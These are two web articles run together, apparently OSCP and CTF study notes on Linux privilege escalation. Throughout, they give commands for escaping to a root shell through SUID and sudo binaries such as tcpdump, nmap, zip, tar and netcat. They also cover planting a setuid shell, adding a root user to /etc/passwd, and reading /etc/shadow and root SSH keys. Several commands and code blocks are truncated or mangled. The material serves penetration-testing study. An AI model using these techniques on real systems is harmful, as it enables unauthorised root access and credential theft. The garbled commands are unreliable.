Linux privilege escalation scripts

Privilege Escalation on Linux Platform

Mar 27, 2020 · 5 min read

In this article, I will note and organize some privilege escalation skills used in my OSCP lab. Some are straightforward but fews are tricky. You have to refresh your brain and turn a corner. Before reading it, I highly recommend you to check g0tmi1t’s blog for basic Linux privilege escalation. Here comes the URL: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

\x01 Kernel Exploit

For kernel exploit, you have to identify the k ernel version and what distribution you used. You can type the following command to do it, and then search any related exploits on exploit DB, wget it, fix it, compile it and execute it. Here comes the commands to identify the kernel version and your distribution:

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release

In most cases, you can use sendpage and dirtycow both kernel exploits to do privilege escalation. And I would like to list two kernel exploits worth mentioned here.

The first one is udev kernel exploit. You can refer the following Mad Irish’s article.

Udev Exploit Allows Local Privilege Escalation

A nasty new udev vulnerability is floating around in the wild that allows local users on Linux systems with udev and…

The second one is regarding ReiserFS xattr vulnerability. If you see any folder mounted with reiserfs file system with xattr attribute set, it’s worth to give it a try. Here comes the reference link:

Offensive Security’s Exploit Database Archive

usr/bin/env python »’ team-edward.py Linux Kernel http://jon.oberheide.org Information…

\x02 Exploit the service running as root

There are 2 cases I encountered in OSCP lab are Samba 2.2.x and MySQL.

For Samba 2.2.x, please check the following link:

Offensive Security’s Exploit Database Archive

Samba /dev/null
$ find / -perm -2000 2>/dev/null

If you find the following command with SUID/SGID permission, perfect, you almost win.

Another way below (if nmap doesn’t have interactive mode):
($ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse)
($ sudo nmap —script=/tmp/shell.nse)

python

strace

tcpdump

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

If you find out one script file with SUID permission, owned by root and executable by others, and this script file will execute some commands. You can play the trick to get root shell. For example here, this script will execute scp command transferring some backup file to somewhere. Add . into $PATH and compile setuid.c, rename the compiled binary to scp and put it under current folder. And then run that script.

$ export PATH=.:$PATH
$ cat setuid.c
#include
int main(void)
<
setuid(0); setgid(0); seteuid(0); setegid(0); execvp(“/bin/sh”, NULL, NULL);
>
$ mv setuid scp
$ ./script.sh

\x04 Abuse SUDO

Use the following command to show which command have allowed to the current user.

And if you find the following command with NOPASSWD and root set in the output. You win again .
zip

$ sudo zip /tmp/test.zip /tmp/test -T —unzip-command=”sh -c /bin/bash”

$ sudo tar cf /dev/null testfile —checkpoint=1 — checkpointaction=exec=/bin/bash

strace

tcpdump

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

$ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse
$ sudo nmap —script=/tmp/shell.nse

Another way below:
($ sudo nmap —interactive
nmap> !sh)

except

$ sudo except spawn sh then sh

gdb/ftp

\x05 Find any writable file owned by root

Please use the following command to find any writable files owned by root. You might be able to see the script file and add the needed command for your privilege escalation.

$ find / -perm -002 -user root -type f -not-path “/proc/*” 2>/dev/null

\x06 Check /etc/passwd if writable

If you see /etc/passwd is writable, the only thing you should do is to echo one line to /etc/passed

$ echo “tseruser::0:0:pawned:/root:/bin/bash” >> /etc/passwd
$ su testuser

\x07 NFS root squashing

According Wikipedia, root squash is a special mapping of the remote superuser (root) identity when using identity authentication (local user is the same as remote user). Under root squash, a client’s uid 0 (root) is mapped to 65534 (nobody). It is primarily a feature of NFS but may be available on other systems as well.

In the scenario which you use showmount to find your target has NFS service up and running and you’re already in via anyway and you find you have the permission to edit /etc/exports as well, for example, you can use sudoedit to edit /etc/exports. You can put no_root_squash to disable root squash. Please see below:

And then you can mount this folder with local root and put the copy of /bin/bash into it. After this, try use the exploited normal account to execute this /bin/bash. You will get the heaven .

\x08 Useful tools

In the final section, I will introduce 3 useful tools for your PE. These tools can check and enumerate your target, show rich information for your PE on Linux platform.

Источник

Linux privilege escalation scripts

Tips and Tricks for Linux Priv Escalation

Start with the basics

Who am i and what groups do I belong to?
id

Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd

What Kernel version and distro are we working with here?
uname -a
cat /etc/issue

What new processes are running on the server (Thanks to IPPSEC for the script!):

We can also use pspy on linux to monitor the processes that are starting up and running:
https://github.com/DominicBreuker/pspy

Check the services that are listening:

What can we EXECUTE?

Who can execute code as root (probably will get a permission denied)?
cat /etc/sudoers

Can I execute code as root (you will need the user’s password)?
sudo -l

What executables have SUID bit that can be executed as another user?
find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb <> \;

Do any of the SUID binaries run commands that are vulnerable to file path manipulation?
strings /usr/local/bin/binaryelf
mail
echo «/bin/sh» > /tmp/mail cd /tmp
export PATH=.
/usr/local/bin/binaryelf

Do any of the SUID binaries run commands that are vulnerable to Bash Function Manipulation? strings /usr/bin/binaryelf
mail function /usr/bin/mail() < /bin/sh; >
export -f /usr/bin/mail
/usr/bin/binaryelf

Can I write files into a folder containing a SUID bit file?
Might be possible to take advantage of a ‘.’ in the PATH or an The IFS (or Internal Field Separator) Exploit.

If any of the following commands appear on the list of SUID or SUDO commands, they can be used for privledge escalation:

SUID / SUDO Executables	Priv Esc Command (will need to prefix with sudo if you are using sudo for priv esc.
(ALL : ALL ) ALL	You can run any command as root. sudo su — sudo /bin/bash
nmap (older versions 2.02 to 5.21)	nmap —interactive !sh
netcat nc nc.traditional	nc -nlvp 4444 & nc -e /bin/bash 127.0.0.1 4444
ncat
awk gawk	awk ‘< print >‘ /etc/shadow awk ‘BEGIN ‘
python	python -c ‘import pty;pty.spawn(«/bin/bash»)’
php
find	find /home -exec nc -lvp 4444 -e /bin/bash \; find /home -exec /bin/bash \;
xxd
vi
more
less
nano
cp
cat
bash
ash
sh
csh
curl
dash
pico
nano
vrim
tclsh
git
scp
expect
ftp
socat
script
ssh
zsh
tclsh
strace	Write and compile a a SUID SUID binary c++ program strace chown root:root suid strace chmod u+s suid ./suid
npm	ln -s /etc/shadow package.json && sudo /usr/bin/npm i *
rsync
tar
Screen-4.5.00	https://www.exploit-db.com/exploits/41154/

Note: You can find an incredible list of Linux binaries that can lead to privledge escalation at the GTFOBins project website here:
https://gtfobins.github.io/

Can I access services that are running as root on the local network?
netstat -antup
ps -aux | grep root

Network Services Running as Root	Exploit actions
mysql	raptor_udf2 exploit 0xdeadbeef.info/exploits/raptor_udf2.c insert into foo values(load_file(‘/home/smeagol/raptor_udf2.so’));
apache	drop a reverse shell script on to the webserver
nfs	no_root_squash parameter Or if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share
PostgreSQL	https://www.exploit-db.com/exploits/45184/

Are there any active tmux sessions we can connect to?
tmux ls

What can we READ?

What files and folders are in my home user’s directory?
ls -la

Do any users have passwords stored in the passwd file? cat /etc/passwd

Are there passwords for other users or RSA keys for SSHing into the box?
ssh -i id_rsa root@10.10.10.10

Are there configuration files that contain credentials?

Application and config file	Config File Contents
WolfCMS config.php	// Database settings: define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’); define(‘DB_USER’, ‘root’); define(‘DB_PASS’, ‘john@123’);
Generic PHP Web App	define(‘DB_PASSWORD’, ‘s3cret’);
.ssh directory	authorized_keys id_rsa id_rsa.keystore id_rsa.pub known_hosts
User MySQL Info	.mysql_history .my.cnf
User Bash History	.bash_history

Are any of the discovered credentials being reused by multiple acccounts?
sudo — username
sudo -s

Are there any Cron Jobs Running?
cat /etc/crontab

What files have been modified most recently?
find /etc -type f -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r
find /home -type f -mmin -60
find / -type f -mtime -2

Is the user a member of the Disk group and can we read the contents of the file system?
debugfs /dev/sda
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

Is the user a member of the Video group and can we read the Framebuffer?
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size

Where can we WRITE?

What are all the files can I write to?
find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null

What folder can I write to?
find / -regextype posix-extended -regex «/(sys|srv|proc|usr|lib|var)» -prune -o -type d -writable 2>/dev/null

Writable Folder / file	Priv Esc Command
/home/USER/	Create an ssh key and copy it to the .ssh/authorized_keys folder the ssh into the account
/etc/passwd	manually add a user with a password of «password» using the following syntax user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000. /home/user:/bin/bash You can even escalate to the root user in some cases with the following syntax: admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0. /root:/bin/bash

Root SSH Key If Root can login via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file.

Add SUDOers If we can write arbitrary files to the host as Root, it is possible to add users to the SUDO-ers group like so (NOTE: you will need to logout and login again as myuser):
/etc/sudoers

Set Root Password We can also change the root password on the host if we can write to any file as root:
/etc/shadow

Based on the Kernel version, do we have some reliable exploits that can be used?

UDEV — Linux Kernel

Automated Linux Enumeration Scripts

It is always a great idea to automate the enumeration process once you understand what you are looking for.

LinEnum is a handy method of automating Linux enumeration. It is also written as a shell script and does not require any other intpreters (Python,PERL etc.) which allows you to run it file-lessly in memory.

First we need to git a copy to our local Kali linux machine:

Next we can serve it up in the python simple web server:

And now on our remote Linux machine we can pull down the script and pipe it directly to Bash:

And the enumeration script should run on the remote machine.

CTF Machine Tactics

Often it is easy to identify when a machine was created by the date / time of file edits. We can create a list of all the files with a modify time in that timeframe with the following command:

This has helped me to find interesting files on a few different CTF machines.

Recursively searching for passwords is also a handy technique:

Wget Pipe a remote URL directory to Bash (linpeas):

Curl Pipe a remote URL directly to Bash (linpeas):

Often, we are provided with password protected SSH keys on CTF boxes. It it helpful to be able to quicky crack and add these to your private keys.

First we need to convert the ssh key using John:

Next we will need to use that format to crack the password:

John should output a password for the private key.

Источник